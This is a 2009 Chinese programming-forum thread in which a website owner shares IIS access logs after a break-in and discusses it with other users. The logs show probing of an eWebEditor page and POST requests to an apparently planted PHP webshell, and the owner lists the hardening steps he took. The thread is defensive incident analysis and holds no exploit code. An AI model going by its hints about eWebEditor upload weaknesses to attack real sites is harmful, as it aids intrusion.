07:12:53 GET /images/bg.jpg 119.136.230.122 304 191 556
07:12:54 GET /images/logo_nav.gif 119.136.230.122 304 191 562
07:12:54 GET /images/bottom_bg.jpg 119.136.230.122 304 190 562
07:12:54 GET /images/top.jpg 119.136.230.122 304 191 557
07:12:54 GET /images/qqconnection.gif 119.136.230.122 304 192 569
07:12:54 GET /images/ico.gif 119.136.230.122 304 191 557
07:13:10 GET /anli.asp 119.136.230.122 200 3677 462
07:13:46 GET /index.asp 119.136.230.122 200 7834 412
07:16:17 GET /xiaodu.asp 119.136.230.122 200 9686 454
07:18:17 GET /html/ 119.136.230.122 403 354 417
07:18:23 GET /html/eWebEditor.asp 119.136.230.122 200 202 431
07:18:43 GET /html/eWebEditor.asp 119.136.230.122 200 202 431
07:18:43 GET /html/eWebEditor.asp 119.136.230.122 200 202 431
07:18:46 GET /html/eWebEditor.asp 119.136.230.122 200 202 431
07:23:21 GET /images/navhover.gif 219.134.222.43 304 0 447
07:23:21 GET /contact.asp 219.134.222.43 200 4442 351
07:23:21 GET /style.css 219.134.222.43 304 191 443
07:23:22 GET /images/qqconnection.gif 219.134.222.43 304 192 458
07:23:22 GET /images/bg.jpg 219.134.222.43 304 191 447
07:23:22 GET /images/ico.gif 219.134.222.43 304 191 448
07:23:22 GET /images/bottom_bg.jpg 219.134.222.43 304 190 453
07:23:22 GET /flash/banner.swf 219.134.222.43 304 191 479
07:23:22 GET /images/logo_nav.gif 219.134.222.43 304 191 453
07:23:22 GET /images/top.jpg 219.134.222.43 304 191 448
07:23:22 GET /images/navhover.gif 219.134.222.43 304 190 452
07:23:45 GET /style.css 119.136.230.122 304 191 541
07:23:45 GET /index.asp 119.136.230.122 200 7834 412
07:23:46 GET /flash/banner.swf 119.136.230.122 304 191 578
07:23:46 GET /images/logo_nav.gif 119.136.230.122 304 191 551
07:23:46 GET /images/bg.jpg 119.136.230.122 304 191 545
07:23:46 GET /images/dianhua.jpg 119.136.230.122 304 191 550
07:23:46 GET /images/qqconnection.gif 119.136.230.122 304 192 558
07:23:46 GET /images/menu.gif 119.136.230.122 304 191 547
07:23:46 GET /flash/lele.js 119.136.230.122 304 190 544
07:23:46 GET /images/aoyun.jpg 119.136.230.122 304 191 548
07:23:46 GET /images/biao.jpg 119.136.230.122 304 191 547
07:23:46 GET /images/xiao.gif 119.136.230.122 304 191 547
07:23:46 GET /images/l_moh2.jpg 119.136.230.122 304 191 549
07:23:46 GET /images/l_moh1.jpg 119.136.230.122 304 191 549
07:23:46 GET /images/l_moh.jpg 119.136.230.122 304 191 548
07:23:46 GET /images/bottom_bg.jpg 119.136.230.122 304 190 551
07:23:46 GET /flash/05.jpg 119.136.230.122 304 191 632
07:23:46 GET /flash/04.jpg 119.136.230.122 304 191 632
07:23:46 GET /flash/03.jpg 119.136.230.122 304 190 631
07:23:46 GET /flash/02.jpg 119.136.230.122 304 191 632
07:23:46 GET /flash/01.jpg 119.136.230.122 304 191 632
07:23:48 GET /images/navhover.gif 119.136.230.122 304 190 550
07:23:55 GET /lele/file/top.asp 119.136.230.122 200 1576 475
07:23:55 GET /lele/admin.asp 119.136.230.122 200 935 426
07:23:55 GET /lele/images/Title.gif 119.136.230.122 200 2723 482
07:23:55 GET /lele/main.asp 119.136.230.122 200 4925 471
07:23:55 GET /lele/css/master.css 119.136.230.122 200 2207 476
07:23:55 GET /lele/file/menu.asp 119.136.230.122 200 13383 476
07:23:55 GET /lele/images/left_top.gif 119.136.230.122 200 323 486
07:23:55 GET /lele/images/157889030.gif 119.136.230.122 200 1531 482
07:23:55 GET /lele/images/button7.jpg 119.136.230.122 200 14474 484
07:23:55 GET /lele/images/button8.jpg 119.136.230.122 200 14317 484
07:23:56 GET /lele/Images/left_bg01.gif 119.136.230.122 200 2225 487
07:23:56 GET /lele/images/topnav_bg.jpg 119.136.230.122 200 9840 486
07:23:56 GET /lele/images/frame_bg.gif 119.136.230.122 200 510 481
07:23:56 GET /lele/Images/system.gif 119.136.230.122 200 2349 484
07:23:56 GET /lele/images/menu.gif 119.136.230.122 200 2071 482
07:23:56 GET /lele/images/left_bottom.gif 119.136.230.122 200 324 489
07:23:56 GET /lele/images/quit.jpg 119.136.230.122 200 13974 481
07:27:30 GET /robots.txt 203.208.60.229 404 1445 254
07:27:30 GET /anli.asp 203.208.60.229 200 3759 291
07:28:30 GET /xiangmu.asp 203.208.60.230 200 3738 293
07:29:01 GET /lele/main.asp 119.136.230.122 200 4925 471
07:29:01 GET /lele/css/master.css 119.136.230.122 304 191 565
07:29:01 GET /lele/images/frame_bg.gif 119.136.230.122 304 191 570
07:29:01 GET /lele/images/157889030.gif 119.136.230.122 304 191 571
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 0 487
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 0 487
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 0 487
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 0 487
07:29:04 GET /lele/Images/left_bg02.gif 119.136.230.122 200 2090 487
07:29:05 GET /lele/about.asp 119.136.230.122 200 8989 494
07:29:05 GET /Code.asp 119.136.230.122 200 4369 506
07:29:05 GET /html/ewebeditor.asp 119.136.230.122 200 268 521
07:31:34 GET /show.asp 203.208.60.228 200 3646 291
07:31:45 GET /lele/about.asp 119.136.230.122 200 315 494
07:31:47 GET /lele/login.asp 119.136.230.122 200 2254 426
07:31:47 GET /lele/js/login.js 119.136.230.122 200 837 474
07:31:47 GET /Code.asp 119.136.230.122 200 4369 484
07:31:47 GET /lele/images/main.gif 119.136.230.122 200 38502 478
07:34:26 GET /lele/login.asp 219.134.222.43 200 2321 227
07:34:26 GET /lele/js/login.js 219.134.222.43 200 837 335
07:34:26 GET /Code.asp 219.134.222.43 200 4369 345
07:34:30 GET /lele/images/main.gif 219.134.222.43 200 38502 339
07:34:30 GET /favicon.ico 219.134.222.43 200 7588 255
07:34:50 POST /lele/login.asp 219.134.222.43 302 314 512
07:34:51 GET /lele/admin.asp 219.134.222.43 200 935 358
07:34:51 GET /lele/file/top.asp 219.134.222.43 200 1576 336
07:34:52 GET /lele/file/menu.asp 219.134.222.43 200 13383 337
07:34:52 GET /lele/images/topnav_bg.jpg 219.134.222.43 200 9840 347
07:34:52 GET /lele/images/Title.gif 219.134.222.43 200 2723 343
07:34:52 GET /lele/images/left_bottom.gif 219.134.222.43 200 324 350
07:34:52 GET /lele/images/left_top.gif 219.134.222.43 200 323 347
07:34:52 GET /lele/css/master.css 219.134.222.43 200 2207 342
07:34:52 GET /lele/Images/system.gif 219.134.222.43 200 2349 345




一部份IIS日志。。。

学习编程www.
2009-10-21 09:58
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
sql防注入加了。。问题是连inc.asp(防注入代码)也被写和了这个代码了。。

在QQ群里请教了。。hmhz版(多谢)。。暂时防了。。

关闭了FSO功能。。
关闭了空间PHP空间的支持(我被上传的是PHP木马)
删除了网站后台功能。。只保留前台能浏览的程序文件。。
甚至。。关闭了FTP空间。。。不能上传了。。知道密码也不行。。
切断了这些可利用资源了。。但愿明天不会有问题了。呵呵。。

谢谢各们位。。

学习编程www.
2009-10-21 11:59
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
以下是引用aspic在2009-10-21 10:02:01的发言:

04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001


你厉害。。我看了好久。。眼睛都快看得掉出来了。。都没看到这个。。

04:32:36 POST /images/gifimg.php 65.182.191.191 200 175 2001
04:32:36 POST /html/anli.php 65.182.191.191 200 160 212

当时也忘了查找。。

就是这个日志了。。呵呵。。


学习编程www.
2009-10-21 12:27
lele2007
Rank: 5Rank: 5
来 自:广东省深圳
等 级:职业侠客
威 望:6
帖 子:1028
专家分:305
注 册:2007-9-4
得分:0 
但是即使找到了它。。我还是不太清楚漏洞在哪里?我想应该是eWebEditor这个html在线编辑器的上传漏洞了。。。

学习编程www.
2009-10-21 12:30



参与讨论请移步原网站贴子:https://bbs.bccn.net/thread-289207-1-1.html




关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.121145 second(s), 8 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved